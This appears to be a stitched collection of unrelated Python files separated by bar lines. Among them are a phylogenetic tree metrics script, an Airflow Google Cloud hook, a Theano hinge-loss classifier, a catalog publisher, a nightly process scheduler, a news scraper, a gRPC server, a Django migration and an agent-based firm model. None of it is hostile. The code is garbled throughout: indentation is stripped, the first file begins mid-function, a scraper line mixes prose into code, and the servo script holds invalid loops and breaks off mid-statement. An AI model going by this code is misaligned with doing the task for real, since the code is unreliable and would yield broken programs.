os.remove(aligned_tmp_file)
os.remove(trimmed_tmp_file)
return(stdev, trimmed_length, tree_certainty, identity)
############################################################################################################################################
def raw_cur_finder(folder):
raw_found = False
cur_found = False
try:
raw_path = glob.glob(folder + os.path.sep + folder + "_RAW" + os.path.sep + folder + "-*RAW*.fasta")
if os.path.exists(raw_path[0]):
raw_found = True
except:
print("Raw file not found!")
try:
cur_path = glob.glob(folder + os.path.sep + folder + "_CUR" + os.path.sep + folder + "-*CUR*.fasta")
if os.path.exists(cur_path[0]):
cur_found = True
except:
print("Curated file not found!")
return(raw_path, raw_found, cur_path, cur_found)
############################################################################################################################################
def main(in_folder, gene_list):
with open("metrics_out.txt", "w+") as metrics_out:
metrics_out.write("gene" + "\t " + "file" + "\t " + "stdev" + "\t" + "trim_len" + "\t" + "relative_TC" + "\t" + "Identity" + "\n")
print("Genes to process:", gene_list)
os.chdir(in_folder)
for gene in gene_list:
print(gene)
raw_cur = raw_cur_finder(gene)
if raw_cur[1] and raw_cur[3] == True:
path_to_raw = raw_cur[0][0]
path_to_cur = raw_cur[2][0]
results_raw = BuildingTrees(path_to_raw)
metrics_out.write(''.join([str(gene), "\traw\t", str(results_raw[0]), "\t", str(results_raw[1]), "\t", str(results_raw[2]), "\t", str(results_raw[3]),"\n"]))
results_cur = BuildingTrees(path_to_cur)
metrics_out.write(''.join([str(gene), "\tcurated\t", str(results_cur[0]), "\t", str(results_cur[1]), "\t", str(results_cur[2]), "\t", str(results_raw[3]),"\n"]))
print("Gene: ", gene, "processed!")
metrics_out.close()
import sys
# Structure of the arguments: python3 pipeline.py data_folder genes_list
args = sys.argv
data_folder = args[1]
gene_list = args[2]
main(data_folder, gene_list)
|
from airflow.hooks import BaseHook
import gcloud
class GCPBaseHook(BaseHook):
"""
A hook for working wth Google Cloud Platform via the gcloud library.
A GCP connection ID can be provided. If it is provided, its values
will OVERRIDE any argments passed to the hook. The following precendance is
observed:
GCP connection fields
GCPBaseHook initialization arguments
host environment
Google Cloud Platform connections can be created from the Airflow UI. If
created manually, the relevant (but optional) fields should be added to
the connection's "extra" field as JSON:
{
"project": "<google cloud project id>",
"key_path": "<path to service account keyfile, either JSON or P12>"
"service_account": "<google service account email, required for P12>"
"scope": "<google service scopes, comma seperated>"
}
service_account is only required if the key_path points to a P12 file.
scope is only used if key_path is provided. Scopes can include, for example:
https://www.googleapis.com/auth/devstorage.full_control
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/devstorage.read_write
If fields are not provided, either as arguments or extras, they can be set
in the host environment.
To set a default project, use:
gcloud config set project <project-id>
To log in:
gcloud auth
"""
client_class = None
def __init__(
self,
gcp_conn_id=None,
project=None,
key_path=None,
service_account=None,
scope=None,
*args,
**kwargs):
if not self.client_class:
raise NotImplementedError(
'The GCPBaseHook must be extended by providing a client_class.')
# compatibility with GoogleCloudStorageHook
if 'google_cloud_storage_conn_id' in kwargs and not gcp_conn_id:
gcp_conn_id = kwargs.pop('google_cloud_storage_conn_id')
self.gcp_conn_id = gcp_conn_id
self.project = project
self.key_path = key_path
self.service_account = service_account
self.scope = scope
self.client = self.get_conn()
def get_conn(self):
# parse arguments and connection extras
if self.gcp_conn_id:
extras = self.get_connection(self.gcp_conn_id).extra_dejson
else:
extras = {}
def load_field(f, fallback=None):
# long_f: the format for UI-created fields
long_f = 'extra__google_cloud_platform__{}'.format(f)
if long_f in extras:
return extras[long_f]
elif f in extras:
return extras[f]
else:
return getattr(self, fallback or f)
project = load_field('project')
key_path = load_field('key_path')
service_account = load_field('service_account')
scope = load_field('scope')
if scope:
scope = scope.split(',')
# guess project, if possible
if not project:
project = gcloud._helpers._determine_default_project()
# workaround for
# https://github.com/GoogleCloudPlatform/gcloud-python/issues/1470
if isinstance(project, bytes):
project = project.decode()
# load credentials/scope
if key_path:
if key_path.endswith('.json') or key_path.endswith('.JSON'):
credentials = gcloud.credentials.get_for_service_account_json(
json_credentials_path=key_path,
scope=scope)
elif key_path.endswith('.p12') or key_path.endswith('.P12'):
credentials = gcloud.credentials.get_for_service_account_p12(
client_email=service_account,
private_key_path=key_path,
scope=scope)
else:
raise ValueError('Unrecognized keyfile: {}'.format(key_path))
client = self.client_class(
credentials=credentials,
project=project)
else:
client = self.client_class(project=project)
return client
|
from django.conf.urls import patterns, url
import views
urlpatterns = patterns(
'',
url(r'^guest/add/$', views.GuestAdd.as_view(), name='guest_add'),
)
|
#!/usr/bin/env python
# Authors: Nicolas Pinto <nicolas.pinto@gmail.com>
# Nicolas Poilvert <nicolas.poilvert@gmail.com>
# License: BSD
"""
Square Hinge Binary Classifier
The code internally uses {-1, +1} for the target values, but outputs predictions
between 0 and 1.
Everything inferior or equal to 0 is mapped to -1 and the rest is mapped to +1.
This concerns only the "ground truth" of course.
The code has many features. In the "fit" method, one can choose to use
mini-batches instead of using the full batch. One can also use a starting value
for the weight vector and the bias in the "fit" method. This allows, e.g. to use
"warm restarts" in the AverageClassifier. Finally, the classifier can be
"biased" towards the positive or negative class by playing with one of the
attributei (here ``negfrac``).
"""
__all__ = ['LBFGSSqHingeClassifier', 'AverageLBFGSSqHingeClassifier']
import numpy as np
from scipy.optimize import fmin_l_bfgs_b
import theano
from theano import tensor as T
EPS = 1e-3
DEFAULT_LBFGS_PARAMS = dict(
iprint=1,
factr=1e7,
maxfun=1e4,
)
DEFAULT_EPS_SENS = 0.1
class LBFGSSqHingeClassifier(object):
def __init__(self,
n_features,
lbfgs_params=DEFAULT_LBFGS_PARAMS,
eps_sens=DEFAULT_EPS_SENS,
negfrac=None,
):
self.n_features = n_features
self.lbfgs_params = lbfgs_params
self.W = np.empty((n_features,), dtype=np.float32)
self.b = np.empty((1), dtype=np.float32)
self.eps_sens = eps_sens
self.negfrac = negfrac
def fit(self, X, Y, w_start=None, b_start=None,
mini_batch_size=10000, n_maxfun=20, bfgs_m=10):
"""
fit X to Y using an epsilon-insensitive square hinge classifier.
Parameters
----------
``X``: 2-dimensional array-like
the input matrix of shape [n_samples, n_features]
``Y``: 2-dimensional array-like
the ouput vector telling what is the class label for each feature
vector in ``X`` (i.e. for each row of ``X``). shape [n_samples,]
``w_start``: 1-dimensional array-like
starting weight vectors of shape [n_features,]. If "None" the vector
is initialized to a vector of length EPS in a random direction.
``b_start``: 1-dimensional vector
starting bias vector of shape [1,]
``mini_batch_size``: integer
size of the mini-batch, i.e. number of samples to use at one time in
the optimization.
``n_maxfun``: integer
number of authorized LBFGS iterations per mini-batch. The last
mini-batch always goes to convergence, so that limit does not apply
to that last mini-batch.
``bfgs_m``: integer
number of dimensions in the Hessian estimation.
"""
assert X.ndim == 2
assert Y.ndim == 1
assert len(X) == len(Y)
assert X.shape[1] == self.n_features
dtype = X.dtype
# -- transform Y_true from R to {-1, 1}
Y_true = Y.ravel().astype(np.int32)
Y_true = np.where(Y_true <= 0, -1, 1)
# -- if the starting values for the weights and bias are not given, we
# initialize them
if w_start == None and b_start == None:
w = np.random.uniform(low=-EPS, high=EPS,
size=X.shape[1]).astype(dtype)
w /= np.linalg.norm(w)
w *= EPS
b = np.random.uniform(low=-EPS, high=EPS, size=1).astype(dtype)
elif w_start == None and b_start != None:
w = np.random.uniform(low=-EPS, high=EPS,
size=X.shape[1]).astype(dtype)
w /= np.linalg.norm(w)
w *= EPS
b_start = np.array(b_start)
assert b_start.ndim == 1
assert b_start.size == 1
b = b_start.astype(dtype)
elif w_start != None and b_start == None:
w_start = np.array(w_start)
assert w_start.ndim == 1
assert w_start.size == X.shape[1]
w = w_start.astype(dtype)
b = np.random.uniform(low=-EPS, high=EPS, size=1).astype(dtype)
else:
w_start = np.array(w_start)
b_start = np.array(b_start)
assert w_start.ndim == 1
assert w_start.size == X.shape[1]
assert b_start.ndim == 1
assert b_start.size == 1
w = w_start.astype(dtype)
b = b_start.astype(dtype)
# -- initial variables
w_size = w.size
m_sens = self.eps_sens
# -- theano program
t_X = T.fmatrix()
t_y = T.fvector()
t_w = T.fvector()
t_b = T.fscalar()
t_H = T.dot(t_X, t_w) + t_b
t_H = 2. * T.nnet.sigmoid(t_H) - 1
t_M = t_y * t_H
# -- here we compute key values for "balancing" the classifier
t_y_true = (t_y + 1) / 2
t_npos = T.sum(t_y_true)
t_nneg = T.sum(1 - t_y_true)
t_npos_inv = 1 / t_npos
t_nneg_inv = 1 / t_nneg
if self.negfrac is None:
t_frac = t_nneg / (t_npos + t_nneg)
else:
t_frac = float(self.negfrac)
t_loss_pos = t_npos_inv * T.sum(t_y_true * \
(T.maximum(0, 1 - t_M - m_sens) ** 2.))
t_loss_neg = t_nneg_inv * T.sum((1 - t_y_true) * \
(T.maximum(0, 1 - t_M - m_sens) ** 2.))
t_loss = (1 - t_frac) * t_loss_pos + t_frac * t_loss_neg
t_dloss_dw = T.grad(t_loss, t_w)
t_dloss_db = T.grad(t_loss, t_b)
# -- compiling theano functions
_f = theano.function(
[t_X, t_w, t_b],
t_H,
allow_input_downcast=True)
_f_df = theano.function(
[t_X, t_y, t_w, t_b],
[t_H, t_loss, t_dloss_dw, t_dloss_db],
allow_input_downcast=True)
# -- how many mini-batch in X
n_mini_batch = int(X.shape[0] / mini_batch_size)
if n_mini_batch <= 1:
mini_batch_size = X.shape[0]
n_mini_batch = 1
# -- compute indices for mini-batch feature vectors
ref_idx = np.random.permutation(X.shape[0])
mini_batch_indices = []
for i in xrange(n_mini_batch):
mini_batch_indices += [ref_idx[i*mini_batch_size:(i+1)*mini_batch_size]]
def minimize_me(vars, X_trn, Y_true_trn):
# -- unpack W and b
w_in = vars[:w_size]
b_in = vars[w_size:]
# -- get loss and gradients from theano function
Y_pred, loss, dloss_w, dloss_b = _f_df(X_trn, Y_true_trn,
w_in, b_in[0])
# -- pack dW and db
dloss = np.concatenate([dloss_w.ravel(), dloss_b.ravel()])
# -- fmin_l_bfgs_b needs double precision...
return loss.astype(np.float64), dloss.astype(np.float64)
# mini-batch L-BFGS iterations
w_av = w.copy()
b_av = b.copy()
n_iter = 1.
if len(mini_batch_indices) > 1:
# -- mini-batch updates for the weights and bias
for idx in mini_batch_indices[:-1]:
X_mb = np.ascontiguousarray(X[idx])
Y_true_mb = np.ascontiguousarray(Y_true[idx])
vars = np.concatenate([w.ravel(), b.ravel()])
best, bestval, info = fmin_l_bfgs_b(minimize_me, vars,
args=[X_mb, Y_true_mb],
factr=1e7, maxfun=n_maxfun,
iprint=1, m=bfgs_m)
w = best[:w_size]
b = best[w_size:]
alpha = 1. / (n_iter + 1.)
w_av = (1. - alpha) * w_av + alpha * w
b_av = (1. - alpha) * b_av + alpha * b
# -- last mini-batch is converged
X_mb = np.ascontiguousarray(X[mini_batch_indices[-1]])
Y_true_mb = np.ascontiguousarray(Y_true[mini_batch_indices[-1]])
vars = np.concatenate([w_av.ravel(), b_av.ravel()])
best, bestval, info = fmin_l_bfgs_b(minimize_me, vars,
args=[X_mb, Y_true_mb],
factr=1e7, maxfun=15000,
iprint=1, m=bfgs_m)
else:
# -- if only one mini-batch exists we converge it
X_mb = np.ascontiguousarray(X[mini_batch_indices[0]])
Y_true_mb = np.ascontiguousarray(Y_true[mini_batch_indices[0]])
vars = np.concatenate([w.ravel(), b.ravel()])
best, bestval, info = fmin_l_bfgs_b(minimize_me, vars,
args=[X_mb, Y_true_mb],
factr=1e7, maxfun=15000,
iprint=1, m=bfgs_m)
self.W = w.astype(np.float32)
self.b = b.astype(np.float32)
self._f = _f
return self
def transform(self, X):
assert X.ndim == 2
Y = self._f(X, self.W, self.b[0])
# -- retransform Y from [-1, +1] to [0, 1]
Y = 0.5 * (Y + 1.)
return Y
def predict(self, X):
Y_pred = self.transform(X) > 0.5
return Y_pred
class AverageLBFGSSqHingeClassifier(object):
def __init__(self,
n_features,
lbfgs_params=DEFAULT_LBFGS_PARAMS,
eps_sens=DEFAULT_EPS_SENS,
negfrac=None
):
self.n_features = n_features
self.lbfgs_params = lbfgs_params
self.W = np.zeros((n_features,), dtype=np.float32)
self.b = np.zeros((1), dtype=np.float32)
self.n_iter = 0
self.clf = LBFGSSqHingeClassifier(n_features,
lbfgs_params=lbfgs_params,
eps_sens=eps_sens,
negfrac=negfrac)
self.last_w = self.W.copy()
self.last_b = self.b.copy()
def partial_fit(self, X, Y, w_start=None, b_start=None,
mini_batch_size=10000, n_maxfun=20, bfgs_m=10):
w_sta = self.last_w.copy()
b_sta = self.last_b.copy()
self.clf.fit(X, Y, w_start=w_sta, b_start=b_sta,
mini_batch_size=mini_batch_size,
n_maxfun=n_maxfun, bfgs_m=bfgs_m)
self.n_iter += 1
alpha = 1.0 / self.n_iter
self.W = (1.0 - alpha) * self.W + alpha * self.clf.W
self.b = (1.0 - alpha) * self.b + alpha * self.clf.b
self.last_w = self.clf.W.copy()
self.last_b = self.clf.b.copy()
return self
def transform(self, X):
assert X.ndim == 2
Y = self.clf._f(X, self.W, self.b[0])
# -- retransform Y from [-1, +1] to [0, 1]
Y = 0.5 * (Y + 1.)
return Y
def predict(self, X):
Y_pred = self.transform(X) > 0.5
return Y_pred
|
'''catalog module contains all the functionalities necessary for managin
the catalog. Functonalities includes:
- Creating opfs from input text
- Assiging ID to the new opf
- Updating the catalog with new opfs
'''
import yaml
import requests
from openpecha.formatters import *
from openpecha.github_utils import create_file, create_readme
from openpecha.github_utils import github_publish
from openpecha.utils import *
buildin_pipes = {
'input': {
'ocr_result_input': ocr_result_input
},
'release': {
'create_release_with_assets': create_release_with_assets
}
}
class CatalogManager:
'''Manages the catalog'''
def __init__(self, pipes=None, formatter_type=None, not_include_files=['releases'], last_id_fn='last_id'):
self.repo_name = "openpecha-catalog"
self.batch_path = "data/batch.csv"
self.last_id_path = f"data/{last_id_fn}"
self.batch = []
self.last_id = self._get_last_id()
self.FormatterClass = self._get_formatter_class(formatter_type)
self.not_include_files = not_include_files
self.pipes = pipes if pipes else buildin_pipes
def _get_formatter_class(self, formatter_type):
'''Returns formatter class based on the formatter-type'''
if formatter_type == 'ocr':
return GoogleOCRFormatter
elif formatter_type == 'tsadra':
return TsadraFormatter
def _get_last_id(self):
'''returns the id assigin to last opf pecha'''
last_id_url = f'https://raw.githubusercontent.com/OpenPecha/openpecha-catalog/master/{self.last_id_path}'
r = requests.get(last_id_url)
return int(r.content.decode('utf-8').strip()[1:])
def _add_id_url(self, row):
id = row[0]
row[0] = f'[{id}](https://github.com/OpenPecha/{id})'
return row
def update_catalog(self):
'''Updates the catalog csv to have new opf-pechas metadata'''
# update last_id
content = self.batch[-1][0].strip()
create_file(self.repo_name, self.last_id_path, content, "update last id of Pecha", update=True)
# update last_id
self.last_id = int(content[1:])
# create batch.csv
content = '\n'.join([','.join(row) for row in map(self._add_id_url, self.batch)]) + '\n'
create_file(self.repo_name, self.batch_path, content, "create new batch")
print('[INFO] Updated the OpenPecha catalog')
# reset the batch
self.batch = []
def _get_catalog_metadata(self, pecha_path):
meta_fn = pecha_path/f'{pecha_path.name}.opf/meta.yml'
metadata = yaml.safe_load(meta_fn.open())
catalog_metadata = [
metadata['id'].split(':')[-1],
metadata['source_metadata']['title'],
metadata['source_metadata']['volume'],
metadata['source_metadata']['author'],
metadata['source_metadata']['id']
]
self.batch.append(catalog_metadata)
create_readme(metadata['source_metadata'], pecha_path)
def format_and_publish(self, path):
'''Convert input pecha to opf-pecha with id assigined'''
formatter = self.FormatterClass()
self.last_id += 1
pecha_path = formatter.create_opf(path, self.last_id)
self._get_catalog_metadata(pecha_path)
github_publish(pecha_path, not_includes=self.not_include_files)
return pecha_path
def ocr_to_opf(self, path):
self._process(
path,
'ocr_result_input',
'create_release_with_assets'
)
def _process(self, path, input_method, release_method):
print('[INFO] Getting input')
raw_pecha_path = self.pipes['input'][input_method](path)
print('[INFO] Convert Pecha to OPF')
opf_pecha_path = self.format_and_publish(raw_pecha_path)
print('[INFO] Release OPF pecha')
self.pipes['release'][release_method](opf_pecha_path)
if __name__ == "__main__":
catalog = CatalogManager(formatter_type='ocr', last_id_fn='ocr-machine-08_last_id')
catalog.ocr_to_opf('./tests/data/formatter/google_ocr/W3CN472')
catalog.update_catalog() |
import subprocess
import sys
import time
import schedule
def start():
# subprocess.Popen(['./ldap_starter.sh'], shell = True)
# t = 10
# time.sleep(t)
subprocess.call(['/home/george/anaconda3/bin/python3.8 ./ldap_con.py'], shell=True)
subprocess.Popen(['/home/george/anaconda3/bin/python3.8 ./server_conn.py'], shell=True)
time.sleep(300)
subprocess.Popen(['./client/vue_run.sh'], shell=True)
time.sleep(20)
print("Web Server is up and running...")
def end():
script1 = './server_conn.py'
script2 = './free_ports.sh'
subprocess.check_call(['pkill','-9','-f', script1])
time.sleep(30)
subprocess.Popen([script2], shell = True)
time.sleep(30)
subprocess.call(['./deleter.sh'], shell = True)
time.sleep(30)
schedule.every().day.at("00:00").do(end)
schedule.every().day.at("00:10").do(start)
while True:
schedule.run_pending()
|
#导入模块
#import pizza
#pizza.make_pizza(15,"mushroom","orange","apple")
#导入函数
from pizza import make_pizza,make_pizza as mp
make_pizza(12,"orange","strawberry","green paper")
mp(14,"mushroom")
|
import pandas as pd, numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
import time
t1=time.time()
train = pd.read_csv('input/train_set.csv')[:100]
test = pd.read_csv('input/test_set.csv')[:10]
test_id = pd.read_csv('input/test_set.csv')[["id"]][:10].copy()
column="word_seg"
# 用来查找数据的维度
n = train.shape
# 将原始文档集合转换为TF-IDF特征矩阵
vec = TfidfVectorizer(ngram_range=(1,2),min_df=3, max_df=0.9,use_idf=1,smooth_idf=1, sublinear_tf=1)
# 这一步的变换是比较耗时的。
# 为何只是对word_seg进行了变换呢?
trn_term_doc = vec.fit_transform(train[column])
# 这个和上面的为何又是不一样呢?
test_term_doc = vec.transform(test[column])
y=(train["class"]-1).astype(int)
# 创建逻辑回归分类器
clf = LogisticRegression(C=4, dual=True)
clf.fit(trn_term_doc, y)
# 得到预测的概率
preds=clf.predict_proba(test_term_doc)
#保存概率文件
# 先把概率转换为pandas数据类型
test_prob=pd.DataFrame(preds)
# print(list(test_prob.columns))
# test_prob.columns的结果是(start=0,stop=1,step=1)
test_prob.columns=["class_prob_%s"%i for i in range(1,preds.shape[1]+1)]
# print(test_prob.columns)
# 输出的结果是;
# Index(['class_prob_1', 'class_prob_2', 'class_prob_3', 'class_prob_4',
# 'class_prob_5', 'class_prob_6', 'class_prob_7', 'class_prob_8',
# 'class_prob_9', 'class_prob_10', 'class_prob_11', 'class_prob_12',
# 'class_prob_13', 'class_prob_14', 'class_prob_15', 'class_prob_16',
# 'class_prob_17', 'class_prob_18'],
# dtype='object')
test_prob["id"]=list(test_id["id"])
# print(test_prob["id"])
test_prob.to_csv('input/prob_lr_baseline.csv',index=None)
#
# #生成提交结果
preds=np.argmax(preds,axis=1)
# [13 8 11 12 8 2 2 12 2 12]
print(preds)
test_pred=pd.DataFrame(preds)
print(test_pred) # 0
test_pred.columns=["class"]
test_pred["class"]=(test_pred["class"]+1).astype(int)
# print(test_pred["class"])
# 0 14
# 1 9
# 2 12
# 3 13
# 4 9
# 5 3
# 6 3
# 7 13
# 8 3
# 9 13
# 这里打印的是预测结果的
print(test_pred.shape) # (10,1)
# 这里打印的是所有的id维度
print(test_id.shape) # (10,1),这个结果是因为我设置的[:10]所以是(10,1)
test_pred["id"]=list(test_id["id"])
test_pred[["id","class"]].to_csv('input/sub_lr_baseline.csv',index=None)
t2=time.time()
print("time use:",t2-t1)
|
# -*- coding:utf-8 -*-
# 深复制与浅复制
import copy
list1 = [1,2,['a','b']]
list2 = list1
list3 = copy.copy(list1)
list4 = copy.deepcopy(list1)
list1.append(3)
list1[2].append('c')
print('list1 = ',list1)
print('list2 = ',list2)
print('list3 = ',list3)
print('list4 = ',list4)
# result:
# list1 = [1, 2, ['a', 'b', 'c'], 3]
# list2 = [1, 2, ['a', 'b', 'c'], 3]
# list3 = [1, 2, ['a', 'b', 'c']]
# list4 = [1, 2, ['a', 'b']]
|
import requests
from bs4 import BeautifulSoup
import openpyxl
keyword = input("검색어 입력: ")
try: # 한 번 시도해볼게
wb = openpyxl.load_workbook("navernews.xlsx") # 기존 파일 밑에 또 다시 저장 됨. (다른 검색어 입력했을 시
sheet = wb.active
print("불러오기 완료")
except: #try가 안되면 시도할게
wb = openpyxl.Workbook() 새로운 파일 생성
sheet = wb.active
sheet.append(['제목','언론사'])
print("새로 파일을 만들었습니다.")
for page in range(1,52, 10): # for page in range(1,52, 10) [1, 11, 21,31,41,51]
# page로 숫자로 지정할 수 있다.
url = "https://search.naver.com/search.naver?where=news&query="+keyword+"&start="+ str(page)
row = requests.get(url, headers={'User-Agent':'Mozilla/5.0'})
html = BeautifulSoup(row.text,'html.parser')
# 컨테이너 : ul.type01>li
# 제목 : a._sp_each_title
# 신문사 : span._sp_each_source
articles = html.select('ul.type01>li')
for news in articles:
title = news.select_one('a._sp_each_title').text.strip()
journal = news.select_one('span._sp_each_source').text.strip()
print(title, journal)
sheet.append([title, journal])
print("="*50)
wb.save("navernews.xlsx")
|
import math
import csv
geometry = {
"servo0min": 0.5,
"servo0max": 2.5,
"servo0mid": 1.85,
"servo1min": 2.3,
"servo1max": 0.55,
"servo1mid": 1.4,
"servo2min": 0.55,
"servo2max": 2.5,
"servo2mid": 1.55,
"servo3min": 2.25,
"servo3max": 0.7,
"servo3mid": 2.25,
"servo4min": 0.5,
"servo4max": 2.5,
"servo4mid": 1.5
}
arms = {
0: 0.84,
1: 10.26,
2: 9.85,
"claw": 12,
"height": 9
}
def summe(i):
r = 0
for element in i:
r += element
return r
def get_pos(anglesdeg):
factor = math.pi / 180
angles = anglesdeg.copy()
for i in angles:
# print(angles[i])
angles[i] = angles[i] * factor
# print(angles[i])
x = 0
z = 0
for angle in range(0, 3):
x += (math.sin(summe([angles[i] for i in range(1, angle + 1)])) * arms[angle])
z += (math.cos(summe([angles[i] for i in range(1, angle + 1)])) * arms[angle])
x += arms[0]
z += arms["height"]
angle = 3
x += (math.sin(summe([angles[i] for i in range(1, angle + 1)]) - 15 * factor) * arms["claw"])
z += (math.cos(summe([angles[i] for i in range(1, angle + 1)]) - 15 * factor) * arms["claw"])
coordinateback = [x, z]
# print(str(x))
# print(str(y))
# print(str(z))
return coordinateback
def get_angles(ms):
angles = {0: 0, 1: 0, 2: 0, 3: 0, 4: 0}
for servo in angles:
if ms[servo]:
minimum = "servo" + str(servo) + "min"
maximum = "servo" + str(servo) + "max"
middle = "servo" + str(servo) + "mid"
val_min = geometry[minimum]
val_max = geometry[maximum]
val_mid = geometry[middle]
change = 1 / 90
if val_min > val_max:
change *= -1
angles[servo] = (ms[servo] - val_mid) / change
return angles
def get_ms(servo, angle):
minimum = "servo" + str(servo) + "min"
maximum = "servo" + str(servo) + "max"
middle = "servo" + str(servo) + "mid"
val_min = geometry[minimum]
val_max = geometry[maximum]
val_mid = geometry[middle]
change = 1 / 90
if val_min > val_max:
change *= -1
ms = (angle * change + val_mid)
if change > 0:
if ms < val_min or ms > val_max:
return 0
else:
if ms > val_min or ms < val_max:
return 0
# ms = round(ms, 2)
return ms
def get_max_min(servo):
minimum = "servo" + str(servo) + "min"
maximum = "servo" + str(servo) + "max"
middle = "servo" + str(servo) + "mid"
val_min = geometry[minimum]
val_max = geometry[maximum]
val_mid = geometry[middle]
change = 1 / 90
if val_min > val_max:
change *= -1
minimum = (val_min - val_mid) / change
maximum = (val_max - val_mid) / change
return [minimum, maximum]
def get_efficency(anglesdeg):
eff = 0
i = 1
for servo in reversed(anglesdeg):
eff += i * servo
i += 1
return eff
pos = []
for servoR in range(5):
pos[servoR] = get_max_min(servoR)
"""
pos = [x, y, z, eff]
if eff < replace
"""
db = {}
for steps in range(1, 0, -0.2):
for servo1 in range(pos[1][0], pos[1][1], steps):
for servo2 in range(pos[2][0], pos[2][1], steps):
for servo3 in range(pos[3][0], pos[3][1], steps):
for servo4 in range(pos[4][0], pos[4][1], steps):
coordinate = []
coordinate.append(get_pos([servo1, servo2, servo3, servo4]))
# coordinate.append(get_efficency([servo0, servo1, servo2, servo3, servo4]))
if coordinate in db:
if db[coordinate][]
|
import random
num_simulations = 100000
num_times_right = 0
# switch choices or nay?
switch_bool = False
for i in range(num_simulations):
doors = ['car', 'goat', 'goat']
random.shuffle(doors)
first_choice = random.choice(doors)
first_choice_index = doors.index(first_choice)
# the two remaining items can be car, goat or goat, goat
doors.pop(first_choice_index)
# switch gate
if switch_bool:
# remaining goat/s index, only get one
remaining_goat_index = doors.index('goat')
doors.pop(remaining_goat_index)
if doors[0] == 'car':
num_times_right+=1
else:
if first_choice == 'car':
num_times_right+=1
pct_correct = (num_times_right/num_simulations)*100
print(pct_correct)
|
# 1. 输入一行字符,统计其中有多少个单词,每两个单词之间以空格隔开。
# 如输入: This is a python program. 输出:There are 5 words in the line.
string = input("pls input a string:")
str_list = string.split(' ')
print("There are {} words in the line.".format(str_list.__len__()))
|
#-*- coding:utf8 -*-
# Copyright (c) 2020 barriery
# Python release: 3.7.0
# Create time: 2020-07-19
import sys
import grpc
from . import schedule
from concurrent import futures
import contextlib
import socket
from contextlib import closing
from .entity import Contract, Node, Cluster
from .proto import schedule_service_pb2_grpc
from .proto import schedule_service_pb2 as schedule_pb2
class ScheduleServicer(schedule_service_pb2_grpc.ScheduleServiceServicer):
def __init__(self):
pass
def _parse_clusters_pb(self, pb_clusters):
clusters = []
for pb_cluster in pb_clusters:
nodes = {}
for pb_node in pb_cluster.nodes:
nodes[pb_node.home] = Node(pb_node.home, pb_node.storage, pb_node.traffic)
clusters.append(Cluster(pb_cluster.name, nodes))
return clusters
def _parse_contract_pb(self, pb_contract):
contract = Contract(None, pb_contract.storage, pb_contract.traffic)
return contract
def QueryDeployedCluster(self, requests, content):
clusters = self._parse_clusters_pb(requests.clusters)
contract = self._parse_contract_pb(requests.contract)
threshold = requests.threshold
cluster_name = schedule.query_deployed_cluster(clusters, threshold, contract)
resp = schedule_pb2.QueryDeployedClusterResponse()
resp.error_code = 0
if cluster_name is None:
resp.error_code = -1
return resp
resp.cluster_name = cluster_name
return resp
def LoadBalancingByNodes(self, requests, content):
clusters = self._parse_clusters_pb(requests.clusters)
threshold = requests.threshold
transfers = schedule.load_balancing_by_nodes(clusters, threshold)
resp = schedule_pb2.LoadBalancingByNodesResponse()
resp.error_code = 0
if transfers is None:
resp.error_code = -1
return resp
for transfer in transfers:
resp.transfers.append(
schedule_pb2.ContractTransfer(
contract_id=transfer["cid"],
cluster_src=transfer["src"],
cluster_dst=transfer["dst"]))
return resp
class ScheduleServer(object):
def __init__(self):
pass
def _port_is_available(self, port):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('0.0.0.0', port))
return result != 0
def start(self, worker_num, port):
#if not self._port_is_available(port):
# raise SystemExit("Port already use: {}".format(port))
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=worker_num))
schedule_service_pb2_grpc.add_ScheduleServiceServicer_to_server(
ScheduleServicer(), server)
server.add_insecure_port('[::]:{}'.format(port))
server.start()
print("Server start on {}".format(port))
server.wait_for_termination()
if __name__ == "__main__":
server = ScheduleServer()
server.start(2, 18080)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-01 09:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('application', '0002_auto_20170329_1928'),
]
operations = [
migrations.CreateModel(
name='album',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=500)),
('release_date', models.DateTimeField()),
('publish_date', models.DateTimeField()),
('cover_url', models.TextField()),
('feature', models.BooleanField()),
('activeyn', models.BooleanField()),
('updated_at', models.DateTimeField(auto_now=True)),
('artist', models.ManyToManyField(to='application.artist')),
('category', models.ManyToManyField(to='application.category')),
],
),
]
|
from mesa import Agent, Model
from mesa.time import RandomActivation
from random import random, randint,choice
class Firm(Agent):
def __init__(self,unique_id, alpha,model):
super().__init__(unique_id, model)
self.agents = []
self.utility=0
self.alpha = random()
self.beta = 1-alpha
self.dead=False
def step(self):
effort = sum([a.effort for a in self.agents])
self.utility = self.alpha * effort + self.beta * effort**2
if len(self.agents) == 0:
self.dead = True
else:
self.income = self.utility/float(len(self.agents))
class FirmAgent(Agent):
"""An agent with fixed initial wealth."""
def __init__(self, unique_id, exp, model):
super().__init__(unique_id, model)
self.utility = 0
self.effort = 1
self.exp=exp
self.job = None
def step(self):
# The agent's step will go here.
if not self.job:
self.job = Firm(0-self.unique_id,1,self.model)
self.job.agents.append(self)
self.model.schedule.add(self.job)
self.effort =self.exp
self.utility = (self.job.utility**self.exp) * ((1-self.effort)**(1-self.exp))
### am I happy?
doo = choice(['stay','leave','startup'])
if doo =='leave':
### join a random firm
firms = [f for f in model.schedule.agents if isinstance(f,Firm) and not f.dead]
self.job.agents.remove(self) ### quit my job
self.job = choice(firms) ### find a new job
self.job.agents.append(self) ##$ add mysefl to payroll
elif doo == 'startup':
self.job = Firm(1000-self.unique_id,1,self.model)
self.job.agents.append(self)
self.model.schedule.add(self.job)
class FirmModel(Model):
"""A model with some number of agents."""
def __init__(self, N):
self.alpha=0.5
self.beta = 1-self.alpha
self.num_agents = N
# Create agents
self.schedule = RandomActivation(self)
# Create agents
for i in range(self.num_agents):
exp = random()
a = FirmAgent(i, exp, self)
self.schedule.add(a)
def step(self):
'''Advance the model by one step.'''
self.schedule.step()
model = FirmModel(100)
for i in range(1000):
if i % 100 ==0: print(i)
model.step()
import pandas as pd
agent_wealth = pd.DataFrame([{'id':a.unique_id, 'w':a.utility} for a in model.schedule.agents])
firms = [f for f in model.schedule.agents if isinstance(f,Firm) and not f.dead]
